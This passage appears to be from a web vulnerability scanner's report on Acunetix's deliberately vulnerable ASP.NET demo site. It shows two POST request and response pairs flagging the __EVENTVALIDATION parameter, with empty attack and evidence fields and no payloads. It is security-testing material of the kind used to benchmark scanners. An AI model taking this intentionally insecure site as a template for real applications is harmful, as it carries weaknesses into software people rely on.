style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1111 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,111 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8461&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAAxGxGtsIZGRk1ZHCXoM1EJVYRzNubS%2BbUbYTVlU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLDw7epBgLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJROTD6K3KVwuAkYI8KV%2BoRUEKEkg%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:34 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAAxGxGtsIZGRk1ZHCXoM1EJVYRzNubS+bUbYTVlU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLDw7epBgLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJROTD6K3KVwuAkYI8KV+oRUEKEkg=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:White" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8220&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAdSNQXdoIZGRk%2Fgxl7y9Q0cpU%2B6pPpoRroXPor04%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLe4%2Fq6BAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8thGjgjgU4D7kd7U%2BZrPLMC%2BBgWg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:36 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAdSNQXdoIZGRk/gxl7y9Q0cpU+6pPpoRroXPor04=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLe4/q6BAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8thGjgjgU4D7kd7U+ZrPLMC+BgWg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:White" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p 